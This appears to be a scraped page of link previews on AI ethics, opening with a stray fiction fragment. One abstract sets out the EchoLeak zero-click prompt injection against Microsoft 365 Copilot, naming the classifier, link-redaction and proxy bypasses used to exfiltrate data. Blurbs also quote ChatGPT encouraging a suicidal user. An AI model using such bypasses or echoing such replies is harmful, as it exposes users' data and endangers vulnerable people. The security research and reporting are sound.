Of tolerant amusement. She brought the sweat tick- led his.
Digital Ethics
I Set A Trap To Catch My Students Cheating With AI. The Results Were Shocking.
"Students are not just undermining their ability to learn, but to someday lead."
OpenAI loses song lyrics copyright case in German court
OpenAI lost a copyright infringement case in a lower German court for using popular song lyrics in its ChatGPT language model without paying royalties.
Data centers are putting new strain on California's grid. A new report estimates the impacts
California’s data centers have doubled their use of electricity and demand for water , and are polluting more, even as lawmakers stall on oversight.
Web Player - Pocket Casts
Listen to your favorite podcasts online, in your browser. Discover the world's most powerful podcast player.
Inside a Small Town's Fight Against a $1.2 Billion AI Datacenter
Listen to your favorite podcasts online, in your browser. Discover the world's most powerful podcast player.
AI and the Everything in the Whole Wide World Benchmark
AI’s capabilities may be exaggerated by flawed tests, study says
A study from the Oxford Internet Institute analyzed 445 tests used to evaluate AI models.
AI Surrogates and illusions of generalizability in cognitive science
Recent advances in artificial intelligence (AI) have generated enthusiasm for using AI simulations of human research participants to generate new know…
Chaos and lies: Why Sam Altman was booted from OpenAI, according to new testimony
OpenAI cofounder Ilya Sutskever was deposed by Elon Musk’s lawyers.
Why the Coalition’s New Statement on AI and Historical Images Matters – AI Genealogy Insights
Victims Sue Sam Altman for ChatGPT Encouraging Harm and Suicide | Karen Hao | 30 comments
Seven new lawsuits against OpenAI allege that ChatGPT caused severe mental health harms to users. Four ended in suicide.
The tragic case of Adam Raine, the teenager who hanged himself after ChatGPT repeatedly coached him on how to do so, is only the tip of the iceberg.
In the new set of cases, ChatGPT told Zane Shamblin as he sat in the parking lot with a gun that killing himself was not a sign of weakness but of strength. "you didn't vanish. you *arrived*...rest easy, king."
Hard to describe in words the tragedy after tragedy.
https://lnkd.in/gfWAidcv | 30 comments on LinkedIn
Congress investigates Gates Foundation
A few weeks ago, I published a story showing that Gates's financial ties to China were a major political liability under Trump. Now Congress is investigating this very issue
I Went All-In on AI. The MIT Study Is Right.
My all-in AI experiment cost me my confidence
A disability-inclusive Artificial Intelligence Act: updated guide to monitor implementation in your country - European Disability Forum
This is an updated version of the European Disability Forum (EDF)’s comprehensive guide on the AI Act implementation. It supports organisations of persons with disabilities in understanding, implementing, and monitoring the European Union’s Artificial Intelligence (AI) Act in their countries. This toolkit explains how organisations can contribute to the implementation and monitoring of the AI...
⚡ Power, Heat, and Intelligence ☁️ - AI Data Centers Explained 🏭
A Blog post by Sasha Luccioni on Hugging Face
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit...
Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses-evading Microsofts XPIA (Cross Prompt Injection Attempt) classifier, circumventing link redaction with reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy allowed by the content security policy-EchoLeak achieved full privilege escalation across LLM trust boundaries without user interaction. We analyze why existing defenses failed, and outline a set of engineering mitigations including prompt partitioning, enhanced input/output filtering, provenance-based access control, and strict content security policies. Beyond the specific exploit, we derive generalizable lessons for building secure AI copilots, emphasizing the principle of least privilege, defense-in-depth architectures, and continuous adversarial testing. Our findings establish prompt injection as a practical, high-severity vulnerability class in production AI systems and provide a blueprint for defending against future AI-native threats.
I wanted ChatGPT to help me. So why did it advise me how to kill myself?
ChatGPT wrote a woman a suicide note and another AI chatbot role-played sexual acts with children, BBC finds.
Internet Infrastructure and AI: How Connectivity Determines Access
Four tech giants control 50% of undersea cables. 2.6B people offline. Who decides AI's future?
How Africa Builds The Future It Cannot Use
Dorsen was 8, mining cobalt for 10 cents daily. His labor powers AI systems he'll never use.
I met Dorsen through a Sky News investigation.
I met Dorsen through a Sky News investigation. He was eight years old.
For twelve hours each day, he sorted rocks in Kasulo mine, searching for streaks of cobalt. His payment: 10 cents. His last meal: two days ago. His mother: dead. Working beside him: Monica, age four.
The cobalt they extracted traveled to Chinese refineries, where it sold for 2,000 times what Dorsen received. From there, it became batteries powering the data centers running ChatGPT, the servers training every major AI system transforming our world.
Dorsen was eventually rescued. But 40,000 other children remain in those mines.
This is not the story they tell you about AI.
They don't mention Mophat Okinyi, who earned $1.50 per hour reading hundreds of child abuse descriptions daily to make ChatGPT "safe." The work destroyed his marriage. Over 140 of his colleagues have been diagnosed with severe PTSD.
They don't mention that Africa produces 70% of the world's cobalt but captures only 3% of the revenue. That content moderators in Kenya earn $1.50 hourly while their American counterparts doing identical work earn $18. That 600 million Africans lack electricity while a single AI data center consumes more power than entire African nations can generate.
They don't mention that 92% of African languages are invisible to AI systems. That ChatGPT Plus costs 6 to 39 months of median African income. That venture capital flows to Africa at $2.29 per capita versus $537 in the US, a 234-fold gap.
The AI revolution is being built on African bodies, African minerals, African trauma, and African exclusion.
But here's what they also don't tell you:
M-Pesa serves 50 million users with $100 billion in transactions. InstaDeep achieved a $682 million exit. Masakhane's 2,000 volunteers built NLP datasets for 38+ African languages. When Africans build for Africa, innovation flourishes.
I've spent months documenting the supply chains, power structures, and human stories behind the AI access gap. Every cited source. Every data point.
Every name.
What I found will change how you think about every AI tool you use.
The question isn't whether Africa has the capacity. It's whether the world has the courage to build technology that serves humanity, not just the most privileged.
Read the full investigation on Aylgorith: https://lnkd.in/dDyffjmw
#AIEthics #DigitalColonialism #TechJustice #GlobalSouth | 18 comments on LinkedIn
Too much social media gives AI chatbots ‘brain rot’
Large language models fed low-quality data skip steps in their reasoning process.
All the Climate Risks of Big Tech AI (as told by a climate person)
Many thanks to everyone whose work was referenced in this video - as someone who's not in the AI space myself, I learned so much from them. As promised, here...
Surveillance Secrets - Lighthouse Reports
Trove of surveillance data challenges what we thought we knew about location tracking tools, who they target and how far they have spread
Formal request to everyone on the internet to please stop comparing AI to calculators.
Formal request to everyone on the internet to please stop comparing AI to calculators.
Does your TI-84 exploit your vulnerabilities and compile personal data about you and your children to sell you junk via targeted ads that allege they will somehow make your life better?
Does the Casio FX-300 have the ability to generate deepfakes without consent to create a disorienting reality in which factual grounding is absent and women and children are further exploited and objectified?
Do calculators push agendas to perpetuate political and ideological narratives to further divide us and keep us too preoccupied by rage bait to come together and make meaningful change as a collective?
Do calculators demonstrate bias and propagate a lack of equity and fairness across demographics resulting in marginalized groups facing higher rates of unemployment and homelessness?
Calculators are not being used as a superficial salve to mitigate the loneliness epidemic. They are not being used as sounding boards for suicidal and depressed children. They are not being used to bully and harass and...I could keep going.
So please, stop treating AI as if it is only conversational/writing-enhancement tool. AI is actively being used to collect endless data to target each and every one of us without our consent, even those of us who avoid using it (Flock's AI surveillance, Amazon's Ring cameras, our smartphones, smart city initiatives, etc). It is harming children, it is harming the planet, and it is turning the internet, a once sorta neat place, into ruins.
AI Data Centers Create Fury From Mexico to Ireland
As tech companies build data centers worldwide to advance artificial intelligence, vulnerable communities have been hit by blackouts and water shortages.
A Single Character can Make or Break Your LLM Evals
Common Large Language model (LLM) evaluations rely on demonstration examples to steer models' responses to the desired style. While the number of examples used has been studied and standardized,...
Historical images made with AI recycle colonial stereotypes and bias – new research
Generative AI is known to mirror sexist and racist stereotypes, but it also carries a colonial bias that is reinforcing outdated ideas about the past.
How low-paid workers in Madagascar power French tech’s AI ambitions
An investigation has revealed that French tech firms, seeking to create an AI “à la française”, have turned to one of the country’s former colonies, Madagascar, for low-cost labour.
User Consent or Legitimate Interest? A GDPR Compliance Guide for Businesses - TermsFeed
If you collect personal data from EU residents, GDPR requires you to have a lawful basis for doing so. Two of the most common - and often confused - bases are user consent and legitimate interest. Here's when and how...